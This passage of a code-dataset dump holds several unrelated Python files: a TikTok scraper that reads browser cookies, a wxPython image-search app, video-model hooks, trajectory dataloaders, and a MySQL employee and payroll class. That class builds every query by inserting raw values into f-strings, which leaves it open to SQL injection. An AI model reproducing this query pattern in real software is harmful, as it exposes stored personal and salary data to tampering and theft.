sticker['stickerText']:\n video_stickers.append(text)\n data_list.append(';'.join(video_stickers))\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['author']['uniqueId'])\n except Exception:\n try:\n data_list.append(video_obj['author'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['author']['nickname'])\n except Exception:\n try:\n data_list.append(video_obj['nickname'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['authorStats']['followerCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['followingCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['heartCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['videoCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['diggCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['author']['verified'])\n except Exception:\n data_list.append(False)\n data_row = pd.DataFrame(dict(zip(data_header,data_list)),index=[0])\n return data_row\n#currently unused, but leaving it in case it's needed later\n'''\ndef fix_tt_url(tt_url):\n if 'www.' not in tt_url.lower():\n url_parts = tt_url.split('://')\n fixed_url = url_parts[0] + '://www.' 
+ url_parts[1]\n return fixed_url\n else:\n return tt_url\n'''\ndef get_tiktok_json(video_url,browser_name=None):\n global cookies\n if browser_name is not None:\n cookies = getattr(browser_cookie3,browser_name)(domain_name='www.tiktok.com')\n tt = requests.get(video_url,\n headers=headers,\n cookies=cookies,\n timeout=20)\n # retain any new cookies that got set in this request\n cookies = tt.cookies\n soup = BeautifulSoup(tt.text, \"html.parser\")\n tt_script = soup.find('script', attrs={'id':\"SIGI_STATE\"})\n try:\n tt_json = json.loads(tt_script.string)\n except AttributeError:\n print(\"The function encountered a downstream error and did not deliver any data, which happens periodically for various reasons. Please try again later.\")\n return\n return tt_json\n\ndef save_tiktok(video_url,\n save_video=True,\n metadata_fn='',\n browser_name=None):\n if save_video == False and metadata_fn == '':\n print('Since save_video and metadata_fn are both False/blank, the program did nothing.')\n return\n\n tt_json = get_tiktok_json(video_url,browser_name)\n video_id = list(tt_json['ItemModule'].keys())[0]\n\n if save_video == True:\n regex_url = re.findall(url_regex,video_url)[0]\n video_fn = regex_url.replace('/','_') + '.mp4'\n tt_video_url = tt_json['ItemModule'][video_id]['video']['downloadAddr']\n headers['referer'] = 'https://www.tiktok.com/'\n # include cookies with the video request\n tt_video = requests.get(tt_video_url,allow_redirects=True,headers=headers,cookies=cookies)\n with open(video_fn, 'wb') as fn:\n fn.write(tt_video.content)\n print(\"Saved video\\n\",tt_video_url,\"\\nto\\n\",os.getcwd())\n\n if metadata_fn != '':\n data_slot = tt_json['ItemModule'][video_id]\n data_row = generate_data_row(data_slot)\n try:\n user_id = list(tt_json['UserModule']['users'].keys())[0]\n data_row.loc[0,\"author_verified\"] = tt_json['UserModule']['users'][user_id]['verified']\n except Exception:\n pass\n if os.path.exists(metadata_fn):\n metadata = pd.read_csv(metadata_fn,keep_default_na=False)\n combined_data = pd.concat([metadata,data_row])\n else:\n combined_data = data_row\n combined_data.to_csv(metadata_fn,index=False)\n print(\"Saved metadata for video\\n\",video_url,\"\\nto\\n\",os.getcwd())\n\ndef save_tiktok_multi_page(tiktok_url, #can be a user, hashtag, or music URL\n save_video=False,\n save_metadata=True,\n metadata_fn='',\n browser_name=None):\n tt_json = get_tiktok_json(tiktok_url,browser_name)\n data_loc = tt_json['ItemModule']\n regex_url = re.findall(url_regex,tiktok_url)[0]\n video_fn = 'tiktok_com_' + regex_url.replace('/','_') + '.mp4'\n if save_metadata == True and metadata_fn == '':\n metadata_fn = regex_url.replace('/','_') + '.csv'\n data = pd.DataFrame()\n\n for v in data_loc:\n data = pd.concat([data,generate_data_row(data_loc[v])])\n if save_video == True:\n video_url = 'https://www.tiktok.com/@' + data_loc[v]['author'] + '/video/' + data_loc[v]['id']\n save_tiktok(video_url,True)\n if save_metadata == True:\n data = deduplicate_metadata(metadata_fn,data)\n data.to_csv(metadata_fn,index=False)\n print('Saved',len(data_loc),'videos and/or lines of metadata')\n\ndef save_tiktok_multi_urls(video_urls,\n save_video=True,\n metadata_fn='',\n sleep=4,\n browser_name=None):\n if type(video_urls) is str:\n tt_urls = open(video_urls).read().splitlines()\n else:\n tt_urls = video_urls\n for u in tt_urls:\n save_tiktok(u,save_video,metadata_fn,browser_name)\n time.sleep(random.randint(1, sleep))\n print('Saved',len(tt_urls),'videos and/or lines of metadata')\n\ndef 
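_retry_get(url, attempts=3, backoff=5):\n    # (Added sketch: _retry_get is a hypothetical helper, not an existing\n    # pyktok API.) Retries a flaky TikTok request a few times with a growing\n    # pause, reusing the module-level headers and cookies.\n    for attempt in range(attempts):\n        try:\n            return requests.get(url, headers=headers, cookies=cookies, timeout=20)\n        except requests.RequestException:\n            if attempt == attempts - 1:\n                raise\n            time.sleep(backoff * (attempt + 1))\n\ndef 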
save_visible_comments(video_url,\n comment_fn=None,\n browser='chromium'):\n start_time = time.time()\n c_options = ChromeOptions()\n c_options.add_argument(\"--headless\")\n f_options = FirefoxOptions()\n f_options.add_argument(\"--headless\")\n if browser == 'chromium':\n driver = webdriver.Chrome(service=ChromeiumService(\n ChromeDriverManager(\n chrome_type=ChromeType.CHROMIUM).install()),\n options=c_options)\n elif browser == 'chrome':\n driver = webdriver.Chrome(service=ChromeiumService(\n ChromeDriverManager().install()),\n options=c_options)\n elif browser == 'firefox':\n driver = webdriver.Firefox(service=FirefoxService(\n GeckoDriverManager().install()),\n options=f_options)\n driver.get(video_url)\n try:\n wait = WebDriverWait(driver,10)\n wait.until(EC.presence_of_element_located((By.XPATH, \"//*[contains(@class,'SpanUserNameText')]\")))\n except TimeoutException:\n print(video_url,\"has no comments\")\n return\n\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n ids_tags = soup.find_all('div',{'class':re.compile('DivCommentContentContainer')})\n comment_ids = [i.get('id') for i in ids_tags]\n names_tags = soup.find_all('a',attrs={'class':re.compile(\"StyledUserLinkName\")})\n styled_names = [i.text.strip() for i in names_tags]\n screen_names = [i.get('href').replace('/','') for i in names_tags]\n comments_tags = soup.find_all('p',attrs={'class':re.compile(\"PCommentText\")})\n comments = [i.text.strip() for i in comments_tags]\n likes_tags = soup.find_all('span',attrs={'class':re.compile('SpanCount')})\n likes = [int(i.text.strip())\n if i.text.strip().isnumeric()\n else i.text.strip()\n for i\n in likes_tags]\n timestamp = datetime.now().isoformat()\n data_header = ['comment_id','styled_name','screen_name','comment','like_count','video_url','time_collected']\n data_list = [comment_ids,styled_names,screen_names,comments,likes,[video_url]*len(likes),[timestamp]*len(likes)]\n data_frame = pd.DataFrame(data_list,index=data_header).T\n\n if comment_fn is None:\n regex_url = re.findall(url_regex,video_url)[0]\n comment_fn = regex_url.replace('/','_') + '_tiktok_comments.csv'\n combined_data = deduplicate_metadata(comment_fn,data_frame,'comment_id')\n combined_data.to_csv(comment_fn,index=False)\n print('Comments saved to file',comment_fn,'in',round(time.time() - start_time,2),'secs.')\n","repo_name":"chriisac/TikTok-Video-Download","sub_path":"venv/Lib/site-packages/pyktok/pyktok.py","file_name":"pyktok.py","file_ext":"py","file_size_in_byte":12593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34454480725","text":"import cStringIO\nimport urllib2\nimport simplejson\nimport wx\nimport cv2.cv as cv\nimport os\n\nclass Panel1(wx.Panel):\n\n#Create the panel, search box and search button\n def __init__(self, parent, id): \n wx.Panel.__init__(self, parent, id)\n self.index = 0\n self.current_image_id = \"-1\"\n self.btn = wx.Button(self, label=\"Search\", pos=(390, 500))\n self.btn.Bind(wx.EVT_BUTTON, self.searchButtonClick)\n self.control = wx.TextCtrl(self, size=(350, 30), pos=(20, 500))\n self.btn = wx.Button(self, label=\"Refresh Images\", pos=(490, 300))\n self.btn.Bind(wx.EVT_BUTTON, self.refresh_button_click)\n self.slider = wx.Slider(self, -1, 125, 0, 1000, (250,460))\n self.slider.Bind(wx.EVT_SCROLL_CHANGED, self.slider_position_changed)\n filedata= open(\"question.png\", \"rb\").read()\n stream = cStringIO.StringIO(filedata)\n image = wx.ImageFromStream(stream)\n self.question_bmp = 
wx.BitmapFromImage(image)\n self.button= [wx.BitmapButton(self, -1 ,self.question_bmp, (205, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (405, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (605, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (805, 5))]\n\n @staticmethod\n def search_image(search_string, index):\n url = ('https://ajax.googleapis.com/ajax/services/search/images?v=1.0&start='+str(index)+ '&imgsz=medium&q='+search_string+'&userip=INSERT-USER-IP')\n request = urllib2.Request(url, None, {'Referer': 'google.com'})\n response = urllib2.urlopen(request)\n return simplejson.load(response)\n\n @staticmethod\n def obtain_bmp_image(self, url):\n filedata = urllib2.urlopen(url).read()\n stream = cStringIO.StringIO(filedata)\n image = wx.ImageFromStream(stream)\n if(image.IsOk()):\n resizedimage = image.Scale(200, 200, wx.IMAGE_QUALITY_HIGH)\n return wx.BitmapFromImage(resizedimage)\n else:\n return self.question_bmp\n\n @staticmethod\n def render_outline_image(image_id, threshold):\n im=cv.LoadImage(\"Image\"+str(image_id)+\".bmp\", cv.CV_LOAD_IMAGE_COLOR)\n gray = cv.CreateImage((im.width, im.height), 8, 1)\n edge = cv.CreateImage((im.width, im.height), 8, 1)\n im_bw1 = cv.CreateImage((im.width, im.height), 8, 1)\n cv.CvtColor(im, gray, cv.CV_BGR2GRAY)\n cv.Not(gray, edge)\n im_white=cv.LoadImage(\"white.bmp\", cv.CV_LOAD_IMAGE_COLOR)\n white = cv.CreateImage((im_white.width, im_white.height), 8, 1)\n cv.Canny(gray, edge, threshold, 125 * 3, 3)\n # cv.Not(white, edge)\n cv.SaveImage(\"edge_image.png\", edge)\n jpg1 = wx.Image('edge_image.png', wx.BITMAP_TYPE_ANY).ConvertToBitmap()\n os.remove(\"edge_image.png\")\n return jpg1\n\n def refresh_button_click(self, event):\n for i in range(0,4):\n os.remove(\"Image\"+str(i)+\".bmp\");\n self.index+=4\n results = Panel1.search_image(self.control.GetValue(), self.index)\n for i in range(0,4):\n bmp = Panel1.obtain_bmp_image(self, results['responseData']['results'][i]['unescapedUrl'])\n self.button[i].SetBitmapLabel(bmp)\n #bitmapbutton=wx.BitmapButton(self,-1,bmp, (5 + i*200,5))\n #bitmapbutton.Bind(wx.EVT_LEFT_DOWN, lambda event, arg=i: self.onImageClick(event, arg))\n bmp.SaveFile(\"Image\"+str(i)+\".bmp\",wx.BITMAP_TYPE_BMP) \n\n def slider_position_changed(self,event):\n #Do Image Processing\n image = Panel1.render_outline_image(self.current_image_id, self.slider.GetValue())\n bitmapbutton=wx.BitmapButton(self,-1,image, (200,250))\n \n#Call Google API and retrieve images. Create bitmapbutton controls and display the images. 
Set onImageClick bindings\n    def searchButtonClick(self, event):\n        self.index = 1\n        results = Panel1.search_image(self.control.GetValue(), self.index)\n        for i in range(0,4):\n            bmp = Panel1.obtain_bmp_image(self, results['responseData']['results'][i]['unescapedUrl'])\n            self.button[i].SetBitmapLabel(bmp)\n            #bitmapbutton=wx.BitmapButton(self,-1,bmp, (5 + i*200,5))\n            self.button[i].Bind(wx.EVT_LEFT_DOWN, lambda event, arg=i: self.onImageClick(event, arg))\n\n            bmp.SaveFile(\"Image\"+str(i)+\".bmp\",wx.BITMAP_TYPE_BMP)\n\n#Do image processing and show result    \n    def onImageClick(self,event,arg): \n        #Do image processing\n        self.current_image_id = str(arg)\n        image = Panel1.render_outline_image(self.current_image_id, self.slider.GetValue())\n        bitmapbutton=wx.BitmapButton(self,-1,image, (200,250))\n        \n        \nwx.InitAllImageHandlers()\napp = wx.PySimpleApp()\nframe1 = wx.Frame(None, -1, \"Sketch-hi-5\", size = (1100, 650))\nPanel1(frame1,-1)\nframe1.Show(1)\napp.MainLoop()\n","repo_name":"hariwashere/sketchhi5","sub_path":"src/sketchhi5.py","file_name":"sketchhi5.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"71010566134","text":"import torch\nfrom mmcv.utils import Registry, build_from_cfg\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nMODULE_HOOKS = Registry('module_hooks')\n\n\ndef register_module_hooks(Module, module_hooks_list):\n    handles = []\n    for module_hook_cfg in module_hooks_list:\n        hook_pos = module_hook_cfg.pop('hook_pos', 'forward_pre')\n        if hook_pos == 'forward_pre':\n            handle = Module.register_forward_pre_hook(\n                build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n        elif hook_pos == 'forward':\n            handle = Module.register_forward_hook(\n                build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n        elif hook_pos == 'backward':\n            handle = Module.register_backward_hook(\n                build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n        else:\n            raise ValueError(\n                f'hook_pos must be `forward_pre`, `forward` or `backward`, '\n                f'but got {hook_pos}')\n        handles.append(handle)\n    return handles\n\n\n@MODULE_HOOKS.register_module()\nclass GPUNormalize:\n    \"\"\"Normalize images with the given mean and std value on GPUs.\n\n    Calling the member function ``hook_func`` returns the forward pre-hook\n    function for module registration.\n\n    GPU normalization, rather than CPU normalization, is recommended when\n    the model runs on GPUs with strong compute capacity such as\n    Tesla V100.\n\n    Args:\n        mean 
(Sequence[float]): Mean values of different channels.\n std (Sequence[float]): Std values of different channels.\n \"\"\"\n\n def __init__(self, input_format, mean, std):\n if input_format not in ['NCTHW', 'NCHW', 'NCHW_Flow', 'NPTCHW']:\n raise ValueError(f'The input format {input_format} is invalid.')\n self.input_format = input_format\n _mean = torch.tensor(mean)\n _std = torch.tensor(std)\n if input_format == 'NCTHW':\n self._mean = _mean[None, :, None, None, None]\n self._std = _std[None, :, None, None, None]\n elif input_format == 'NCHW':\n self._mean = _mean[None, :, None, None]\n self._std = _std[None, :, None, None]\n elif input_format == 'NCHW_Flow':\n self._mean = _mean[None, :, None, None]\n self._std = _std[None, :, None, None]\n elif input_format == 'NPTCHW':\n self._mean = _mean[None, None, None, :, None, None]\n self._std = _std[None, None, None, :, None, None]\n else:\n raise ValueError(f'The input format {input_format} is invalid.')\n\n def hook_func(self):\n\n def normalize_hook(Module, input):\n x = input[0]\n assert x.dtype == torch.uint8, (\n f'The previous augmentation should use uint8 data type to '\n f'speed up computation, but get {x.dtype}')\n\n mean = self._mean.to(x.device)\n std = self._std.to(x.device)\n\n with torch.no_grad():\n x = x.float().sub_(mean).div_(std)\n\n return (x, *input[1:])\n\n return normalize_hook\n\nclass STN(nn.Module):\n def __init__(self):\n super(STN, self).__init__()\n\n # Spatial transformer localization-network\n self.localization = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=7), #nn.Conv2d(1, 8, kernel_size=7) bykaihuang 输入数据维度是3\n nn.MaxPool2d(2, stride=2),\n nn.ReLU(True),\n nn.Conv2d(64 ,128, kernel_size=5),\n nn.MaxPool2d(2, stride=2),\n nn.ReLU(True)\n )\n\n # Regressor for the 3 * 2 affine matrix\n self.fc_loc = nn.Sequential(\n nn.Linear(128*156*116, 32),\n nn.ReLU(True),\n nn.Linear(32, 3 * 2)\n )\n # Initialize the weights/bias with identity transformation\n self.fc_loc[2].weight.data.zero_()\n self.fc_loc[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\n\n # Spatial transformer network forward function\n def forward(self, x):\n print(\"#################x_shape:\",x.size())\n xs = self.localization(x)\n print(\"~~~~~~~~~~~~~~~~~xs.size:\",xs.size()) # xs=[2,128,196,332]\n xs = xs.view(-1,128*156*116)\n theta = self.fc_loc(xs)\n theta = theta.view(-1, 2, 3)\n\n grid = F.affine_grid(theta, x.size())\n x = F.grid_sample(x, grid)\n\n return x\n","repo_name":"giim-hf-lab/Intelligent-elderly-care-system","sub_path":"mmaction/utils/module_hooks.py","file_name":"module_hooks.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"5874594559","text":"import pickle\nimport json\nimport numpy as np\nfrom numpy import random\nimport torch\nimport torch.utils.data as data\n\nexpert_dataset_name = ['expert_s.pkl','exert_a.pkl']\nfail_dataset_name = ['fail_s.pkl','fail_a.pkl']\nTORCS_ACTION_FACTOR = 10\nclass torcs_dataset(data.Dataset):\n def __init__(self,root='./dataset/',train=True,split=0.1,num_traj=100,state_samples=20):\n self.root = root\n self.num_traj = num_traj\n self.s_dim = 29\n self.a_dim = 2\n self.state_samples = state_samples\n with open(root + 'expert_s.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n expert_s = np.asarray(data) # [24588 x 29]\n indexes_e = self.define_trajectory(expert_s) # [9]\n with open(root + 'expert_a.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n expert_a = 
np.asarray(data) # [24588 x 2]\n\n with open(root + 'fail_s.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n fail_s = np.asarray(data) # [24335 x 29]\n indexes_f = self.define_trajectory(fail_s)+expert_a.shape[0] # [54]\n indexes_f = indexes_f[0::4]\n with open(root + 'fail_a.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n fail_a = np.asarray(data) # [24335 x 2]\n print(np.mean(fail_a),np.mean(expert_a))\n self.traj_indexes = np.concatenate((indexes_e,indexes_f))\n trajectories_e = np.concatenate((expert_s,expert_a),axis=-1)\n trajectories_f = np.concatenate((fail_s,fail_a),axis=-1) \n self.trajectories = np.concatenate((trajectories_e,trajectories_f),axis=0)\n possible_index=[]\n traj_type = []\n self.total_type = self.traj_indexes.shape[0]\n for i,ind in enumerate(self.traj_indexes):\n try:\n possible_index.extend([a for a in range(ind+num_traj,self.traj_indexes[i+1]-num_traj)])\n traj_type.extend([i for _ in range(ind+num_traj,self.traj_indexes[i+1]-num_traj)])\n except:\n possible_index.extend([a for a in range(ind+num_traj,self.trajectories.shape[0]-num_traj)])\n traj_type.extend([i for _ in range(ind+num_traj,self.trajectories.shape[0]-num_traj)])\n self.possible_index = torch.LongTensor(possible_index)\n self.traj_types = torch.LongTensor(traj_type)\n self.trajectories = torch.FloatTensor(self.trajectories)\n self.traj_ = torch.unique(self.traj_types)\n \n def __getitem__(self, index):\n '''\n TODO\n start with right index! start with state\n '''\n traj_type = self.traj_[index]\n traj_index = torch.where(self.traj_types==traj_type)[0]\n perm = torch.randperm(traj_index.size(0))\n idx = perm[:2]\n samples = traj_index[idx]\n traj_1 = self.trajectories[samples[0]:samples[0]+self.num_traj,:]\n traj_2 = self.trajectories[samples[1]:samples[1]+self.num_traj,:]\n # Sample state, action \n random_index_1 = np.random.choice(np.arange(0,self.num_traj),self.state_samples)\n state_1 = traj_1[random_index_1,:self.s_dim].squeeze(0)\n action_1 = traj_1[random_index_1,self.s_dim:].squeeze(0)\n \n state_2 = traj_2[random_index_1,:self.s_dim].squeeze(0)\n action_2 = traj_2[random_index_1,self.s_dim:].squeeze(0)\n return traj_1,traj_2,state_1,action_1,state_2,action_2,traj_type\n \n def __len__(self):\n return self.traj_.size(0)\n \n def define_trajectory(self,states):\n init_state = states[0,:]\n a = np.where((states == init_state).all(axis=1))[0]\n return a\n\nMAX_LEN = 100\n\nclass synthetic_example(data.Dataset):\n def __init__(self,path = './dataset/sdata_6.json',state_only=True,fixed_len=False,num_traj=50,state_samples=40):\n self.num_traj = num_traj\n self.path = path\n self.state_samples = state_samples\n with open(self.path,'r') as jf:\n data = json.load(jf)\n self.traj_type=[]\n self.traj_len=[]\n self.state_only= state_only\n self.fixed_len = fixed_len\n if self.state_only:\n self.traj = torch.zeros((len(data),MAX_LEN*2))\n self.actions = torch.zeros((len(data),MAX_LEN*2))\n else:\n self.traj = torch.zeros((len(data),MAX_LEN*4))\n # Load Data\n for key in data:\n self.traj_type.append([data[key]['vel'],data[key]['noise'],data[key]['type']])\n traj_len = len(data[key]['states'][0])\n self.traj_len.append(traj_len)\n if self.state_only:\n traj = torch.zeros((2*traj_len))\n actions = torch.zeros((2*traj_len))\n traj[0::2] = torch.FloatTensor(data[key]['states'][0])\n traj[1::2] = torch.FloatTensor(data[key]['states'][1])\n traj = traj.repeat(int((MAX_LEN)/(traj_len)))\n actions[0::2] = torch.cat((torch.FloatTensor(data[key]['actions'][0]),torch.zeros(1)),dim=-1)*10\n 
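# even slots carry channel 0 and odd slots channel 1; actions get one zero\n                # of padding (one fewer action than states) and are scaled by 10, matching\n                # TORCS_ACTION_FACTOR defined at the top of this file\n                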
actions[1::2] = torch.cat((torch.FloatTensor(data[key]['actions'][1]),torch.zeros(1)),dim=-1)*10\n actions = actions.repeat(int((MAX_LEN)/(traj_len)))\n self.actions[int(key),:] = actions\n else:\n traj = torch.zeros((4*traj_len))\n traj[0::4] = torch.FloatTensor(data[key]['states'][0])\n traj[1::4] = torch.FloatTensor(data[key]['states'][1])\n traj[2::4] = torch.cat((torch.FloatTensor(data[key]['actions'][0]),torch.zeros(1)),dim=-1)*10\n traj[3::4] = torch.cat((torch.FloatTensor(data[key]['actions'][1]),torch.zeros(1)),dim=-1)*10\n traj = traj.repeat(int((MAX_LEN)/(traj_len)))\n self.traj[int(key),:] = traj\n self.traj_type = torch.FloatTensor(self.traj_type)\n \n def __getitem__(self, index):\n traj = self.traj[index,:]\n traj_type = self.traj_type[index]\n if self.fixed_len:\n traj_len = self.num_traj\n reduced = 0\n else:\n reduced = random.randint(1,10) \n traj_len = self.num_traj - reduced\n sampled = torch.randperm(MAX_LEN-traj_len)\n # sampled = random.choice([0,25,50],2)\n if self.state_only:\n temp = torch.zeros((reduced*2))\n traj_1 = traj[2*sampled[0]:2*sampled[0]+traj_len*2]\n states1= torch.cat((traj_1[0::2].unsqueeze(-1),traj_1[1::2].unsqueeze(-1)),dim=-1)\n actions1 = self.actions[index,2*sampled[0]:2*sampled[0]+traj_len*2]\n actions1= torch.cat((actions1[0::2].unsqueeze(-1),actions1[1::2].unsqueeze(-1)),dim=-1)\n traj_1 = torch.cat((traj_1,temp),axis=0)\n\n traj_2 = traj[2*sampled[1]:2*sampled[1]+traj_len*2]\n states2= torch.cat((traj_2[0::2].unsqueeze(-1),traj_2[1::2].unsqueeze(-1)),dim=-1)\n actions2 = self.actions[index,2*sampled[1]:2*sampled[1]+traj_len*2]\n actions2= torch.cat((actions2[0::2].unsqueeze(-1),actions2[1::2].unsqueeze(-1)),dim=-1)\n traj_2 = torch.cat((traj_2,temp),axis=0)\n\n sampled_sa = torch.randperm(traj_len)[:self.state_samples]\n state_1 = states1[sampled_sa,:]\n action_1 = actions1[sampled_sa,:]\n\n state_2 = states2[sampled_sa,:]\n action_2 = actions2[sampled_sa,:]\n else:\n traj_1 = traj[4*sampled[0]:4*sampled[0]+traj_len*4]\n states1= torch.cat((traj_1[0::4].unsqueeze(-1),traj_1[1::4].unsqueeze(-1)),dim=-1)\n actions1= torch.cat((traj_1[2::4].unsqueeze(-1),traj_1[3::4].unsqueeze(-1)),dim=-1)\n \n traj_2 = traj[4*sampled[1]:4*sampled[1]+traj_len*4]\n states2= torch.cat((traj_2[0::4].unsqueeze(-1),traj_2[1::4].unsqueeze(-1)),dim=-1)\n actions2= torch.cat((traj_2[2::4].unsqueeze(-1),traj_2[3::4].unsqueeze(-1)),dim=-1)\n \n sampled_sa = torch.randperm(traj_len)[:self.state_samples]\n state_1 = states1[sampled_sa,:]\n action_1 = actions1[sampled_sa,:]\n\n state_2 = states2[sampled_sa,:]\n action_2 = actions2[sampled_sa,:]\n \n return traj_1,traj_2,state_1,action_1,state_2,action_2,traj_type,traj_len\n \n def __len__(self):\n return self.traj.size(0)\n\nif __name__ == '__main__':\n a = synthetic_example()\n b = a.__getitem__(0)\n print(b)","repo_name":"jeongeun980906/Representation_Learning_R3","sub_path":"utils/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2538470007","text":"import mysql.connector\n\nclass Modelo:\n def __init__(\n self,\n usuario,\n host,\n database,\n password=\"\"\n ):\n self.__user = usuario\n self.__host = host\n self.__password = password\n self.__database = database\n\n def __conexion(self):\n database = mysql.connector.connect(\n user = self.__user,\n host = self.__host,\n password = self.__password,\n database = self.__database\n )\n\n return database\n\n\n def 
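_fetch_all(self, sql):\n        # (Added sketch: _fetch_all is a hypothetical helper, not part of the\n        # original class.) Factors out the connect/execute/fetchall/close\n        # pattern that the query methods below repeat.\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(sql)\n        result = cur.fetchall()\n        con.close()\n        return result\n\n    def 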
obtener_usuarios(self):\n        con = self.__conexion()\n        cur = con.cursor()\n\n        cur.execute(\"SELECT * FROM empleados\")\n        result = cur.fetchall()\n        con.close()\n        return result\n\n    def obtener_usuario(self,cedula):\n        con = self.__conexion()\n        cur = con.cursor()\n\n        # NOTE: these queries interpolate values with f-strings; parameterized\n        # queries (cur.execute(sql, params)) would prevent SQL injection.\n        cur.execute(f\"SELECT * FROM empleados WHERE cedula = {cedula}\")\n        result = cur.fetchone()\n        con.close()\n        return result\n\n\n    \"\"\"\n    cedula INT NOT NULL PRIMARY KEY,\n    nombre VARCHAR(30) NOT NULL,\n    apellido VARCHAR(30) NOT NULL,\n    cargo_empleado INT NOT NULL DEFAULT 1,\n    contrasenna VARCHAR(250) NOT NULL,\n    CONSTRAINT fk_cargo FOREIGN KEY (cargo_empleado) REFERENCES cargos(id_tipo)\n    \"\"\"\n\n    def crear_usuario(\n        self,\n        cedula,\n        nombre,\n        apellido,\n        contrasenna,\n        cargo=1\n    ):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"INSERT INTO empleados (cedula,nombre,apellido,contrasenna,cargo_empleado) VALUES ({cedula},'{nombre}','{apellido}','{contrasenna}',{cargo})\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def actualizar_usuario(\n        self,\n        cedula,\n        nombre,\n        apellido,\n        contrasenna,\n        cargo=1\n    ):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"UPDATE empleados SET cedula={cedula},nombre='{nombre}',apellido='{apellido}',cargo_empleado={cargo},contrasenna='{contrasenna}' WHERE cedula = {cedula}\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def eliminar_usuario(self,cedula):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"DELETE FROM empleados WHERE cedula = {cedula}\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def obtener_salario(self,cedula):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"SELECT * FROM nominas WHERE cedula = {cedula}\")\n        result = cur.fetchall()\n        con.close()\n        return result\n\n    def guardar_salario(self,cedula,salario):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"INSERT INTO nominas (cedula,salario) VALUES ({cedula},{salario})\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def actualizar_salario(self,cedula,salario):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"UPDATE nominas SET cedula={cedula},salario={salario} WHERE cedula = {cedula}\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def eliminar_salario(self,cedula):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"DELETE FROM nominas WHERE cedula={cedula}\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def get_cargos(self):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(\"SELECT * FROM cargos\")\n        result = cur.fetchall()\n        con.close()\n        return result\n\n    def set_porcentaje(self,porcentaje,id_cargo):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"INSERT INTO porcentajes (porcentaje,id_cargo) VALUES ({porcentaje},{id_cargo})\")\n        con.commit()\n        result = cur.rowcount\n        con.close()\n        return result\n\n\n    def get_porcentajes(self):\n        con = self.__conexion()\n        cur = con.cursor()\n\n        cur.execute(\"SELECT * FROM porcentajes\")\n        result = cur.fetchall()\n        con.close()\n        return result\n\n\n    def busqueda(self,search,param):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"SELECT * FROM empleados WHERE {param} LIKE '{search}%'\")\n        result = cur.fetchall()\n        con.close()\n        return result\n\n\n    def get_cargo(self,id):\n        con = self.__conexion()\n        cur = con.cursor()\n        cur.execute(f\"SELECT * FROM cargos WHERE id_tipo = {id}\")\n        result = 
cur.fetchone()\n con.close()\n return result\n \n def set_sesion(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"INSERT INTO session (cedula,status) VALUES ({cedula},TRUE)\")\n con.commit()\n con.close()\n\n def get_sesion(self):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM session\")\n result = cur.fetchone()\n con.close()\n return result\n \n def remove_sesion(self,cedula):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"DELETE FROM session WHERE cedula = {cedula}\")\n con.commit()\n con.close()\n\n def get_bucetas(self):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM bucetas\")\n result = cur.fetchone()\n con.close()\n return result\n \n def get_horario(self,numero):\n con = self.__conexion()\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM control_bucetas WHERE numero = {numero}\")\n result = cur.fetchone()\n con.close()\n return 